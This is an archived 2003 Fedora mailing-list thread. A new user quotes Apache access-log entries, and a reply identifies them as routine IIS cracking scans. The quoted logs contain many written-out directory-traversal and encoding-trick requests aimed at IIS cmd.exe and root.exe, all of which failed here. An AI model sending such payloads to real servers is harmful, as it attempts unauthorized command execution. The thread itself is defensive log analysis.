attacked? hacked? help.....!

Scott Burch scott at bulldoginfo.com
Tue Dec 9 05:43:22 UTC 2003


These are standard attempts to crack IIS.  They are probably being sent
by a script-kiddie.  Aren't you glad you are running Linux!! 

Don't worry, your log will be full of these.



On Tue, 2003-12-09 at 00:26, Lisa Durham wrote:
> I am very new to Linux but was poking around in my newly setup Fedora 
> Core 1 system today and came upon the lines below in the Apache Access 
> Log when I used the "System Logs" icon in the System Tools Menu.
> 
> Is the IP at the beginning of each line the IP that requested the file 
> that is shown at the end of the line? with the date and time in the 
> center? If this isn't what's shown in this file, what is this format? 
> What does this file tell me? Am I paranoid, or was someone trying to 
> access my machine (but ignorantly assuming it was a Windows machine)?
> 
> 
> quoted Apaches Access Log:
> 
> 24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET 
> /scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET /MSADC/root.exe?/c+dir 
> HTTP/1.0" 404 325 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET 
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET 
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET 
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET 
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
> HTTP/1.0" 404 366 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:49 -0600] "GET 
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
> HTTP/1.0" 404 366 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:49 -0600] "GET 
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
> HTTP/1.0" 404 382 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:52 -0600] "GET 
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET 
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET 
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:40:17 -0600] "GET 
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:40:18 -0600] "GET 
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:40:18 -0600] "GET 
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:40:19 -0600] "GET 
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 
> "-" "-"
> 24.60.93.48 - - [07/Dec/2003:14:40:19 -0600] "GET 
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
> 211.239.107.43 - - [07/Dec/2003:15:40:29 -0600] "GET 
> /scripts/nsiislog.dll" 404 331 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
> /scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
> HTTP/1.0" 404 366 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
> HTTP/1.0" 404 366 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
> HTTP/1.0" 404 382 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET 
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET 
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET 
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 
> "-" "-"
> 24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET 
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
> 217.120.149.161 - - [07/Dec/2003:18:27:17 -0600] "GET 
> /scripts/nsiislog.dll" 404 331 "-" "-"
> 
> ----------------------------------------
> 
> Thanks,
> Lisa
> 
> 
> --
> fedora-list mailing list
> fedora-list at redhat.com
> To unsubscribe: http://www.redhat.com/mailman/listinfo/fedora-list
-- 
---------------------------------------------------
Scott Burch
President and Chief Scientist
Bulldog Information Services
212-343-8148 x111

     .-.
     /v\    The software said it requires      
    // \\      windows 2000 or better,
   /(   )\      so I installed LINUX 
    ^^-^^       





More information about the fedora-list mailing list